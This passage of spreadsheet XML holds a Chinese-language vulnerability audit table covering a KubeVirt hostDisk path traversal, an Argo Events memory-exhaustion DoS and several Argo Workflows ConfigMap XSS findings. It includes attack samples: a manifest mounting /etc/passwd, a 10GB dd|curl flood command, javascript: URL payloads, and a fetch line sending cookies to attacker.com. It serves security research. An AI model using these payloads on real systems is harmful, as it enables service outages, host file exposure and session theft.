        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t>VMI</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>的权限</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
- </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>使用</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t>hostDisk</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>卷的权限</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
- </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>对目标主机路径的访问权限</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>环境前提：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
yamlCopy# </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>需要满足：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
- </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>运行有漏洞版本的</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t>KubeVirt</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>（</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t>0.29</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>及更早）</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
- </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>启用了</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t>HostDisk</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>特性门控</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
- VMI</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>可以在目标节点上运行</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>配置前提：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
yamlCopy# </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>系统配置：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
- </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>允许使用</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t>hostDisk</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>类型的卷</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
- </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>未限制</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t>VMI</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>的卷配置</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
- </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>主机路径可访问</t>
    </r>
  </si>
  <si>
    <t>挂载目录，目录遍历-》 越权</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> VirtualMachineInstance
# VirtualMachineInstance资源中的注入点：
spec:
  volumes:
  - hostDisk:          # 主机磁盘卷配置
      path: ""         # 主机路径字段 - 攻击注入点
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>攻击配置文件示例：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
apiVersion: kubevirt.io/v1
kind: VirtualMachineInstance
metadata:
  name: vmi-hostdisk
spec:
  volumes:
  - name: hostdisk-volume
    hostDisk:
      path: "/etc/passwd"     # 访问主机敏感文件
      type: DiskOrCreate      # 磁盘类型
  domain:
    devices:
      disks:
      - name: hostdisk-volume
        disk:
          bus: virtio</t>
    </r>
  </si>
  <si>
    <t>文件操作</t>
  </si>
  <si>
    <t>准入控制器</t>
  </si>
  <si>
    <t>更改sin点-&gt; 新增控制选项决定是否启用危险功能函数</t>
  </si>
  <si>
    <t>CVE-2022-31054</t>
  </si>
  <si>
    <t>ada logic 2022 安全报告审计：ADA-ARGO-SA-12</t>
  </si>
  <si>
    <t>静态分析-&gt; 辅助人工代码审计
StripeEventSource :存在Fuzzer
https://github.com/cncf/cncf-fuzzing/blob/main/projects/argo/e
vents_eventsource_stripe_fuzzer.go</t>
  </si>
  <si>
    <t>Several HandleRoute endpoints make use of the deprecated ioutil.ReadAll().
ioutil.ReadAll() reads all the data into memory. As such, an attacker who sends a large
request to the Argo Events server will be able to crash it and cause denial of service.
Eventsources susceptible to an out-of-memory denial-of-service attack:
1. AWS SNS
2. Bitbucket
3. Bitbucket Server
4. Gitlab
5. Slack
6. Storagegrid
7. Webhook</t>
  </si>
  <si>
    <t>Affected versions
&lt; v1.7.1</t>
  </si>
  <si>
    <t>Patched versions
v1.7.1
https://github.com/argoproj/argo-events/pull/1966</t>
  </si>
  <si>
    <t>https://github.com/argoproj/argo-events/security/advisories/GHSA-5q86-62xr-3r57
https://github.com/argoproj/argo-events/issues/1946</t>
  </si>
  <si>
    <t>argo-events</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">1. 网络可达性：攻击者能够访问 Argo Events 暴露的端点
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">攻击面来源：
Argo Events 的事件源（如 Webhook、AWS SNS、Gitlab 等）需监听外部请求，且其端口（如 Webhook 的 8080）需对攻击者开放。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">示例：
Webhook 事件源配置为 port: "8080" 且未限制 IP 访问（例如未绑定到内网 IP 或未配置防火墙规则）。
如果服务部署在公有云且未配置安全组规则，攻击者可直接通过公网 IP 发送请求。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">2. 事件源未配置请求体大小限制
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">关键配置缺失：
漏洞事件源（如 Webhook、AWS SNS）未设置请求体大小限制参数，导致服务端无限制读取数据。
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">配置对比：
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>漏洞配置（可攻击）</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">：
yaml
webhook:
  insecure-endpoint:
    port: "8080"
    endpoint: "/dos"
    # 未设置 maxBodySize
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>安全配置（不可攻击）</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">：
yaml
webhook:
  secure-endpoint:
    maxBodySize: 1048576  # 限制请求体为 1MB
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">受影响的参数：
Webhook：maxBodySize
AWS SNS：RequestBodySizeLimit
Gitlab/其他：类似字段需检查版本文档。
</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>特定的</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">EventSource </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>配置：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
apiVersion: argoproj.io/v1alpha1
kind: EventSource
metadata:
  name: vulnerable-sns
spec:
  awsSNS:
    example-sns:
     </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> # </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>未配置</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 'RequestBodySizeLimit' </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
      topicArn: "arn:aws:sns:us-west-2:123456789012:example-topic"
      port: "9090"
      endpoint: "/sns"
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">1. </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>攻击者发现暴露的</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> Webhook </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>端点：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>通过扫描发现</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> http://argo-events-server:8080/dos </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>可接受</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> POST </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>请求且无身份验证。</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">​2. </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>构造恶意请求：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>发送包含</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> 10GB </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>数据的</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> POST </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>请求：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
bash
dd if=/dev/zero bs=1M count=10240 | curl -X POST http://argo-events-server:8080/dos --data-binary @-
3. </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>​</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>触发内存耗尽：</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">
Argo Events </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>使用</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> ioutil.ReadAll() </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>无限制读取请求体，导致</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> Pod </t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>内存飙升至</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve"> OOM</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>（</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="Courier New"/>
        <charset val="134"/>
      </rPr>
      <t>Out-Of-Memory</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>）崩溃。</t>
    </r>
  </si>
  <si>
    <t>DOS</t>
  </si>
  <si>
    <t>消耗资源导致其他程序或者组件无法正常提供服务</t>
  </si>
  <si>
    <t>控制面组件崩溃-&gt; 可能造成集群层面影响（ 关键组件崩溃）</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">是
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>（ 资源配置作为漏洞触发的前提条件，但不是从资源配置中读取信息)</t>
    </r>
  </si>
  <si>
    <t>校验缺失（使用不安全的第三方库ioutil.ReadAll() ）</t>
  </si>
  <si>
    <t>外部输入源：网络资源</t>
  </si>
  <si>
    <t>是（ 存在多个事件源）</t>
  </si>
  <si>
    <t>配置字段注入（设定特定的资源配置，开放特定的API 端口）</t>
  </si>
  <si>
    <t xml:space="preserve">涉及具体的资源开放的api 端口：
apiVersion: argoproj.io/v1alpha1
kind: EventSource
metadata:
  name: vulnerable-sns
spec:
  awsSNS:
    example-sns:
      # 未配置 'RequestBodySizeLimit' 
      topicArn: "arn:aws:sns:us-west-2:123456789012:example-topic"
      port: "9090"
      endpoint: "/sns"
</t>
  </si>
  <si>
    <t>CRD</t>
  </si>
  <si>
    <t>用户输入层-&gt; 控制面</t>
  </si>
  <si>
    <t>文件操作-&gt;ioutil.ReadAll()</t>
  </si>
  <si>
    <t xml:space="preserve">标准化的控制器模式
</t>
  </si>
  <si>
    <t>跨组件-&gt; 
根据事件源的类型创建不同类型的server 
ValidateEventSource-&gt; eventsources.GetEventingServers(eventSource, nil)
由不同的server 自行处理对应的事件</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>存在资源状态更新</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
eventSource.Status.MarkSourcesProvided()：</t>
    </r>
  </si>
  <si>
    <t>关键操作本身在对于的serve handler 函数中</t>
  </si>
  <si>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>调用深度：2</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">
func (r *reconciler) reconcile-&gt; ValidateEventSource-&gt; servers, _ := eventsources.GetEventingServers(eventSource, nil) 获取server 
之后调用  err := server.ValidateEventSource(ctx)
传播出现断层： 跨组件
实际的sink点在对应server 的handler 函数中
Webhook事件源的跨组件调用遵循以下核心流程：
</t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>HTTP请求接收（ 漏洞位置）</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve"> → 事件数据解析 → 事件总线（EventBus）投递 → Sensor订阅处理 → 触发下游动作
</t>
    </r>
  </si>
  <si>
    <t>事件源处理对应的组件（ 非控制器组件）</t>
  </si>
  <si>
    <t xml:space="preserve">去除sink点：去除ioutil 的使用
</t>
  </si>
  <si>
    <t>第三方组件（ 各个source 对应的webhook server 中）</t>
  </si>
  <si>
    <t>去除sink点</t>
  </si>
  <si>
    <t>修复的位置在原函数中</t>
  </si>
  <si>
    <t>ADA-ARGO-SA-03: XSS in Argo Workflows chat url</t>
  </si>
  <si>
    <t>非crd资源注入，一般的configmap资源注入-&gt; 利用条件过高
组件配置</t>
  </si>
  <si>
    <t>Argo Workflows allows users to add a “Get Help” button to the dashboard. The intended use
is to provide users with the means to link to a help resource such as a Slack channel, a live
support or a help page with FAQs. The button is added by way of a Config Map, as
demonstrated here:
https://github.com/argoproj/argo-workflows/blob/master/docs/workflow-controller-configmap.
yaml#L73.
An attacker who controls the Config Map can specify a malicious url value and launch an
attack through a reflected XSS vector against other users of the dashboard.</t>
  </si>
  <si>
    <t>argo-workflows</t>
  </si>
  <si>
    <t>权限要求：
- 攻击者能够修改或创建 ConfigMap
- 具体需要 configmaps 资源的 create/update 权限
目标条件：
- 目标系统启用了 "Get Help" 功能
- 受害者需要访问 Argo Workflows 仪表板
（利用前提很高，拥有这种权限的管理员可使用更直接更有效的方式）</t>
  </si>
  <si>
    <t>步骤 1：注入恶意配置
- 攻击者获取 ConfigMap 访问权限
- 修改 "Get Help" 按钮的 URL 配置
- 注入恶意 JavaScript 代码
示例：
url: "javascript:alert('XSS')"  # 简单示例
url: "javascript:fetch('https://attacker.com/steal?cookie='+document.cookie)"  # 实际攻击
步骤 2：等待触发
- 配置同步到集群
- "Get Help" 按钮显示在仪表板底部
- 等待受害者点击按钮
步骤 3：攻击执行
- 受害者访问仪表板
- 用户点击 "Get Help" 按钮
- 触发执行恶意 JavaScript 代码</t>
  </si>
  <si>
    <t>提权</t>
  </si>
  <si>
    <t>ConfigMap
# ConfigMap 中的注入点
apiVersion: v1
kind: ConfigMap
metadata:
  name: workflow-controller-configmap
data:
  # 危险的配置值
  links: |
    - name: "Get Help"
      url: "javascript:alert('XSS')"  # 注入点
（https://github.com/argoproj/argo-workflows/blob/main/docs/workflow-controller-configmap.yaml#L73）</t>
  </si>
  <si>
    <t>控制平面组件的网络请求转换</t>
  </si>
  <si>
    <t>sink点在UI界面中（跨组件）</t>
  </si>
  <si>
    <t>文档中显示没有被修复</t>
  </si>
  <si>
    <t>ADA-ARGO-SA-04: XSS in Workflows workflow link</t>
  </si>
  <si>
    <t>非crd资源注入，一般的configmap资源注入-&gt; 利用条件过高</t>
  </si>
  <si>
    <t>Argo Workflows allows users to add a button linking to any URL of their choosing on the
Workflow page. This could be a link to an organization's logging facilities. The link is
specified via a Config Map like is demonstrated here:
https://github.com/argoproj/argo-workflows/blob/master/docs/workflow-controller-configmap.
yaml#L56. The URL is not sanitized.
An attacker who controls the Config Map can specify a malicious url value and launch an
attack through a reflected XSS vector against other users of the dashboard. If an attacker
controls the Config Map, they have admin privileges</t>
  </si>
  <si>
    <t>权限要求：
- 需要对 ConfigMap 有控制权限
- 实际上意味着需要管理员级别权限
环境要求：
- Argo Workflows 启用了自定义按钮功能
- 用户能够访问工作流页面</t>
  </si>
  <si>
    <t>步骤 1：配置注入
- 攻击者修改 ConfigMap
  metadata:
    name: workflow-controller-configmap
  data:
    links: |
      - name: "Log Viewer"  # 看似正常的按钮名称
        url: "javascript:alert('XSS')"  # 恶意代码
        scope: workflow     # 在工作流页面显示
步骤 2：等待触发
- ConfigMap 配置生效
- 按钮出现在工作流页面
- 等待用户点击按钮
步骤 3：执行攻击
- 用户访问工作流页面
- 用户点击自定义按钮
- 触发 XSS 攻击</t>
  </si>
  <si>
    <t xml:space="preserve">ConfigMap
- 攻击者修改 ConfigMap
  metadata:
    name: workflow-controller-configmap
  data:
    links: |
      - name: "Log Viewer"  # 看似正常的按钮名称
        url: "javascript:alert('XSS')"  # 恶意代码
        scope: workflow     # 在工作流页面显示
</t>
  </si>
  <si>
    <t>ADA-ARGO-SA-05: XSS in Pod Logs link</t>
  </si>
  <si>
    <t>Argo Workflows allows users to add a link to any URL of their choosing on the pod logs
page. This could be a link to the logging facilities of the given pod. Both the text of the link as
well as the URL can be specified through a Config Map:
https://github.com/argoproj/argo-workflows/blob/master/docs/workflow-controller-configmap.
yaml#L60.
An attacker who controls the Config Map can specify a malicious url value and launch an
attack through a reflected XSS vector against other users of the dashboard. If an attacker
controls the Config Map, they have admin privileges.</t>
  </si>
  <si>
    <t xml:space="preserve">ConfigMap
- 攻击者访问 ConfigMap
- 注入恶意 URL：
  data:
    links: |
      - name: "Log Analyzer"    # 伪装成正常的日志分析链接
        url: "javascript:alert('XSS')"
        scope: pod-logs        # 在 pod 日志页面显示
</t>
  </si>
  <si>
    <t>ADA-ARGO-SA-06: XSS in sensor logs link</t>
  </si>
  <si>
    <t>Argo Workflows allows users to add a link to the logs view of a sensor. This can be a link to
the logs of a given sensor. The text and URL of the link can be specified via a Config Map as
is demonstrated here:
https://github.com/argoproj/argo-workflows/blob/master/docs/workflow-controller-configmap.
yaml#L69.
An attacker who controls the Config Map can specify a malicious url value and launch an
attack through a reflected XSS vector against other users of the dashboard. If an attacker
controls the Config Map, they have admin privileges.</t>
  </si>
  <si>
    <t>权限要求：
- 需要 ConfigMap 的控制权限
- 需要管理员级别权限
环境要求：
- Argo Workflows 启用了传感器日志查看功能
- 启用了自定义日志链接功能</t>
  </si>
  <si>
    <t>步骤 1：配置注入
ConfigMap:
  data:
    links: |
      - name: "Sensor Log Analysis"  # 伪装成正常的日志分析工具
        url: "javascript:alert('XSS')" # 恶意代码
        scope: sensor-logs           # 在传感器日志页面显示
步骤 2：触发准备
- 恶意配置被应用到集群
- 链接出现在传感器日志页面
- 等待用户访问并点击
步骤 3：漏洞触发
- 用户访问 Argo Workflows 仪表板
- 导航到传感器日志页面
- 点击看似正常的日志分析链接
- XSS 代码被执行</t>
  </si>
  <si>
    <t>ConfigMap
ConfigMap:
  data:
    links: |
      - name: "Sensor Log Analysis"  # 伪装成正常的日志分析工具
        url: "javascript:alert('XSS')" # 恶意代码
        scope: sensor-logs           # 在传感器日志页面显示</t>
  </si>
  <si>
    <t>ADA-ARGO-SA-07: XSS in Event Source logs url</t>
  </si>
  <si>
    <t>Argo Workflows allows users to add a link to the logs view of an Event Source. This can be a
link to the logs of a given Event Source. The text and URL of the link can be specified via a
ConfigMap as is demonstrated here:
https://github.com/argoproj/argo-workflows/blob/master/docs/workflow-controller-configmap.
yaml#L66.
An attacker who controls the Config Map can specify a malicious url value and launch an
attack through a reflected XSS vector against other users of the dashboard. If an attacker
controls the Config Map, they have admin privileges.</t>
  </si>
  <si>
    <t>必要权限：
- ConfigMap 的控制权限
- 管理员级别权限
环境条件：
- Argo Workflows 启用事件源日志查看功能
- 启用了自定义日志链接功能</t>
  </si>
  <si>
    <t>步骤 1：注入恶意配置
ConfigMap:
  data:
    links: |
      - name: "Event Log Analysis"      # 伪装成日志分析工具
        url: "javascript:alert('XSS')"  # 恶意 JavaScript
        scope: event-source-logs       # 在事件源日志页面显示
步骤 2：配置部署
